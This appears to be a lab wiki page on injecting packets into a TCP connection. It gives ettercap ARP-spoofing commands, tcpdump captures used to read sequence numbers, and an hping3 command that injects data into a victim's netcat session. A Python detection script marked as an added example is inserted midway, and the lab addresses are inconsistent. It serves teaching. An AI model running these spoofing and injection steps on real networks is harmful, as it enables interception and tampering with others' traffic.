Sending packets into a connection
Revision as of 5 July 2021, 13:33
Prerequisites
Test setup
- CLIENT=10.0.10.103
- OPFER=10.0.10.104
- ANGREIFER=10.0.10.101
- DSTPORT=2020
Attacker
- On the attacker we need 2 terminals
Terminal 1
- Set the variables
- CLIENT=10.0.10.103
- OPFER=10.0.10.104
- ANGREIFER=10.0.10.101
- DSTPORT=2020
- ARP spoofing
- ettercap -Tq -i eth0 -M arp /$CLIENT,$OPFER// /$OPFER,$CLIENT//
Terminal 2
- tcpdump -ni eth0 -S host 10.0.10.104 and tcp
- We are looking for SEQ, ACK and SRCPORT
Victim (OPFER)
- nc -lp 2020
Attacker (ANGREIFER)
Client window two
- client
thomas.will@cardassia ~ $ nc 192.168.244.52 2020
Client window one
cardassia ~ # tcpdump -ni lan -S port 2020
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on lan, link-type EN10MB (Ethernet), capture size 65535 bytes
15:26:44.663526 IP 192.168.244.1.58257 > 192.168.244.52.2020: Flags [S], seq 1758983238, win 29200, options [mss 1460,sackOK,TS val 2268763 ecr 0,nop,wscale 7], length 0
15:26:44.663980 IP 192.168.244.52.2020 > 192.168.244.1.58257: Flags [S.], seq 963043879, ack 1758983239, win 28960, options [mss 1460,sackOK,TS val 193210349 ecr 2268763,nop,wscale 7], length 0
15:26:44.664035 IP 192.168.244.1.58257 > 192.168.244.52.2020: Flags [.], ack 963043880, win 229, options [nop,nop,TS val 2268763 ecr 193210349], length 0
Client window three
Create a file of 10 bytes, including the line break
cardassia ~ # echo "hallo tux" > data.dat
cardassia ~ # hping3 -s 58257 -p 2020 -A -d 10 -E data.dat -c 1 -M 1758983239 -L 963043880 192.168.244.52
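The sequence arithmetic behind the capture above, together with a check a defender can run over the same tcpdump -S output. This is an added example, not part of the original page: the names LINE, CAPTURE and analyse are assumptions, the handshake lines are the page's own with the options field cut, and the two data segments are constructed. It tracks the next expected sequence number per sender (a SYN consumes one number, so the first data byte is ISN+1) and reports data that reuses sequence space already sent, which is what the receiving side sees when a second sender has written into the stream.

```python
import re

# Fields of a `tcpdump -n -S` TCP line (absolute sequence numbers).
LINE = re.compile(
    r"IP (?P<src>\S+) > (?P<dst>\S+): Flags \[(?P<flags>[^\]]+)\]"
    r"(?:, seq (?P<seq>\d+)(?::\d+)?)?(?:, ack (?P<ack>\d+))?.*length (?P<len>\d+)")

# First three lines: handshake from the page, options cut. Last two: constructed.
CAPTURE = """\
15:26:44.663526 IP 192.168.244.1.58257 > 192.168.244.52.2020: Flags [S], seq 1758983238, win 29200, length 0
15:26:44.663980 IP 192.168.244.52.2020 > 192.168.244.1.58257: Flags [S.], seq 963043879, ack 1758983239, win 28960, length 0
15:26:44.664035 IP 192.168.244.1.58257 > 192.168.244.52.2020: Flags [.], ack 963043880, win 229, length 0
15:27:10.000001 IP 192.168.244.1.58257 > 192.168.244.52.2020: Flags [.], seq 1758983239:1758983249, ack 963043880, win 229, length 10
15:27:30.000001 IP 192.168.244.1.58257 > 192.168.244.52.2020: Flags [P.], seq 1758983239:1758983245, ack 963043880, win 229, length 6
""".splitlines()


def analyse(lines):
    """Return (next expected seq per sender, findings of reused sequence space)."""
    next_seq, findings = {}, []
    for line in lines:
        m = LINE.search(line)
        if not m or m["seq"] is None:
            continue  # the pure ACK in this capture has no seq field
        src, seq, length = m["src"], int(m["seq"]), int(m["len"])
        # SYN and FIN each consume one sequence number, payload consumes `length`.
        end = (seq + length + ("S" in m["flags"]) + ("F" in m["flags"])) % 2**32
        expected = next_seq.get(src)
        behind = 0 if expected is None else (expected - seq) % 2**32
        if length and 0 < behind < 2**31:
            # Data starting before the next expected byte: a retransmission,
            # or two different senders writing into the same stream.
            findings.append({"src": src, "seq": seq, "len": length,
                             "expected": expected})
        if expected is None or (end - expected) % 2**32 < 2**31:
            next_seq[src] = end  # only ever move the expectation forward
    return next_seq, findings


if __name__ == "__main__":
    state, hits = analyse(CAPTURE)
    print(state)
    for hit in hits:
        print("sequence space reused:", hit)
```

A finding alone does not prove injection, because ordinary retransmissions also start before the expected byte; a reused start with a different length, as in the constructed last line, is the case worth a closer look with tcpdump -X.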
Links
- https://www.rationallyparanoid.com/articles/hping.html
- http://www.eggdrop.ch/texts/hping/#2_1
- http://0daysecurity.com/articles/hping3_examples.html
- http://maintain-under-the-radar.org/index.php/security/terminologie/scannen-von-netzwerken
Attacker
Client window one
- tcpdump
cardassia ~ # tcpdump -ni lan -S port 2020
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on lan, link-type EN10MB (Ethernet), capture size 65535 bytes
